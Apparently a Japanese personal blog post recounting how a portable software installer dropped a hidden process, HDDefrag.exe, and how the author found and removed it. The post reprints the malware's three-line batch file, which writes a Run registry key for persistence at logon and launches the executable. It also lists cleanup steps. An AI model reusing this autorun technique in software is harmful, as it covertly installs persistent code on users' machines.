某portable ソフトをダウンロードし、ノートンでウィルスチェックもし、
インストールをしていたら ・・・ ・・・
インストールの終わり頃から、CPUが異常に高くなった!
原因は、HDDefrag.exe というプログラムのタスクが2個。
※デフラグか? と思って、強制終了をためらったが・・・
DISKのアクセスはそんなに激しくしてなかった。 ??
アプリのインストール中にウィルスらしき物が動き出すなんて初めてだ! びっくり。
→追記。 ウィルス部分を削除出来ないかゴソゴソしてたら、
.exe の中の .exe を間違って「開く」をしてしまい、2回目が動いてしまった!
その時、動き始めてすぐにHDDefrag.exe のタスクが1個あることを確認!
こいつは、インストールし始めたらすぐに起動されるようだ。
システム・エクスプローラーで何物か見たら、
C:\Documents and Settings\ユーザー名\Application Data\Adobe\Flash Player\File Cache
の下の HDDefrag.exeだと言う。
これまでの情報から、デフラグではないと思って、タスクを強制終了させた。
ネット上で調べてみると、意外と情報がない。
4月に発見のウィルスと言うことくらい。
PCの中のパスワード等の情報を盗む奴なのかどうか分からないが、
可能性はある。 用心しよう。
こんなファイルたちが、上記に書いた「\Application Data\Adobe\Flash Player\File Cache」
の下に出来ます。 ・・・moveでそれらを移動させたもの:
この中の、hddef.bat はこんな内容です。 (3行)
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v HDDefrag /d "wscript \"%appdata%\Adobe\Flash Player\File Cache\file.vbs\" \"%appdata%\Adobe\Flash Player\File Cache\hddef.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\File Cache\HDDefrag.exe"
HKCU、つまり レジストリの HKEY_CURRENT_USER の下に新たにキーを
追加し、 ・・・・・・詳しくないけど、PCが立ち上がるときに起動するプログラムを
登録しておく場所みたい
今回潜り込ませたHDDefrag.exeを実行する、という処理内容になってます。
とりあえずの対処としてやったこと:
・そのプログラムが通信出来ないように、ノートン側で「遮断」の設定に変更。
・今回追加されたレジストリの項目を削除。
・このウィルスのプログラム本体がある、\File Cache フォルダ以下を削除。
たぶん、\File Cache はこのウィルス用でAdobeは使ってないと思う。
怖いね、セキュリティソフトのチェックに引っかからず、アプリのインストール時に
仕込まれてしまうウィルスがあるとは!
portable 版にはこういう奴もあるので、ご注意ください。 特に有料ソフトでは。